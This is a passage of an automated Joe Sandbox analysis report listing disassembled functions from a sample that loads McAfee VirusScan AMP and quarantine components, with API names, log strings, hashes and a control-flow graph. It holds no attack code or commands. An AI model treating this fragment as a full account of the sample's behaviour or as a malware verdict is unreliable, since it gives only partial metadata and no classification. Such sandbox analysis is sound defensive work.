                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                    • Instruction ID: 704a0aabc537f1e31f0afbca255925d9eba168ec405761a3cd791702eec614ca
                                                    • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                    • Instruction Fuzzy Hash: A1F06271B1A2998AEBA4CF3CE852B397BD0F7487C0F948079D68D83B44D63C90618F08

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                    • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                    • API String ID: 1021822269-3147033232
                                                    • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                    • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                    • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                    • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                    • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                    • API String ID: 883923345-381368982
                                                    • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                    • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                    • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                    • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                    • String ID:
                                                    • API String ID: 1613947383-0
                                                    • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                    • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                    • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                    • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                    • String ID:
                                                    • API String ID: 1995290849-0
                                                    • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                    • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                    • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                    • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                    • String ID:
                                                    • API String ID: 1995290849-0
                                                    • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                    • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                    • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                    • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                    • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                    • API String ID: 93015348-1041928032
                                                    • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                    • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                    • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                    • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                    • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                    • API String ID: 3682727354-300733478
                                                    • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                    • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                    • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                    • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                    • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                    • API String ID: 2587151837-1427723692
                                                    • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                    • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                    • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                    • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                    • String ID: SetDllDirectoryW$kernel32.dll
                                                    • API String ID: 3184163350-3826188083
                                                    • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                    • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                    • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                    • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcesslstrlen
                                                    • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                    • API String ID: 3424473247-996641649
                                                    • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                    • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                    • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                    • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: String$ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 1775797328-0
                                                    • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                    • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                    • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                    • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                    • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                    • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                    • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                    • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 1232609184-0
                                                    • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                    • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                    • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                    • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                    • String ID: H
                                                    • API String ID: 2107338056-2852464175
                                                    • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                    • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                    • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                    • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                    • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                    • API String ID: 1322048431-2685357988
                                                    • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                    • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                    • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                    • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                    • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                    • API String ID: 2984211723-3002863673
                                                    • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                    • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                    • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                    • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                    • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                    • API String ID: 678758403-4129911376
                                                    • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                    • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                    • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                    • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcesslstrlen
                                                    • String ID:
                                                    • API String ID: 3424473247-0
                                                    • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                    • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                    • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                    • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                    • String ID: bad exception$csm$csm$csm
                                                    • API String ID: 3766904988-820278400
                                                    • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
